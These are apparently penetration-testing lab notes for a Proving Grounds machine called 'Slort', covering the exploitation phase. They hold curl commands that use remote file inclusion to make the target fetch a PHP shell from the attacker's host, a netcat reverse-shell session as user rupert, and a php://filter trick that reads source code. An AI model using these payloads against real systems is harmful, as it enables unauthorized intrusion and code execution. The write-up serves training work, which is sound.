RCE
While both web servers on the target ports 4443 and 8080 appear identical, they both have been identified to be vulnerable to LFI and RFI
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -s http://$IP:4443/site/index.php?page=http://192.168.45.215/shell.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -s http://$IP:8080/site/index.php?page=http://192.168.45.215/shell.phpSending the payload via RFI to either web servers
/Practice/Slort/3-Exploitation/attachments/{9A094104-0FA9-45E7-8EFA-CE2519143B8B}.png)
Hit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.134.53] 64191
SOCKET: Shell has connected! PID: 1324
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site> whoami
slort\rupert
C:\xampp\htdocs\site> hostname
slort
C:\xampp\htdocs\site> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.134.53
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.134.254Initial Foothold established to the target system as the rupert user via RFI to RCE
data:// wrapper
/Practice/Slort/3-Exploitation/attachments/{5227D254-EB23-4AC3-9637-C4202F675358}.png)
using the PHP data:// wrapper, which REQUIRES the allow_url_include(RFI) option enabled
php://filter
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -s 'http://192.168.134.53:8080/site/index.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d
<?php
$page = null;
if (isset($_GET["page"])) {
include($_GET["page"]);
}
else {
echo "ERROR: No page specified...";
header("Location: index.php?page=main.php", true, 301);
exit();
}
?> php://filter method to read files